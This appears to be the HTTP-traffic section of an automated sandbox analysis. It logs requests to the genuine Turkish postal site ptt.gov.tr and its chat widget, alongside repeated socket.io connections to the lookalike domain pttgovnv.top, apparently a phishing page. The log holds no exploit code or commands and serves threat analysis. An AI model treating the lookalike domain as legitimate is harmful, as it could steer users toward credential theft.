Source: global trafficHTTP traffic detected: GET /static/assets/js/langcodes.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/doviz-kurlari-c5ba2bb9e7f07c80.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /static/assets/js/linkify.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/owl.carousel.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/chat_files/jss/chat_v3.min.js?v=13 HTTP/1.1Host: service-edge.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4110-3d9f5b5d3b9b653a.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/css/e341381de31b7a3e.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/linkify.html.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/2425cba10de1645b.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /static/assets/js/linkify.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5Bslug%5D-88e5a3b326ec670d.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-dfb7e1261ea0e06f.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liQWk HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/linkify.html.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liQWk HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liQiR&sid=HHxSQQKw-ZFDRlk7BQUU HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=HHxSQQKw-ZFDRlk7BQUU HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: lLNPmKqHUqMjn5b8ZC+9ww==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /_next/static/css/2425cba10de1645b.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liQiP&sid=HHxSQQKw-ZFDRlk7BQUU HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liQtD&sid=HHxSQQKw-ZFDRlk7BQUU HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liQiR&sid=HHxSQQKw-ZFDRlk7BQUU HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liQtH&sid=HHxSQQKw-ZFDRlk7BQUU HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liRFv HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Posta/PulVeFilateliUst.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liRFv HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=psKQgyFLGrrSy6S3BQUX HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 7NxDzV6fIxGwzD+u/5eTqg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liRRl&sid=psKQgyFLGrrSy6S3BQUX HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liRRl&sid=psKQgyFLGrrSy6S3BQUX HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liRdh&sid=psKQgyFLGrrSy6S3BQUX HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liRRj&sid=psKQgyFLGrrSy6S3BQUX HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
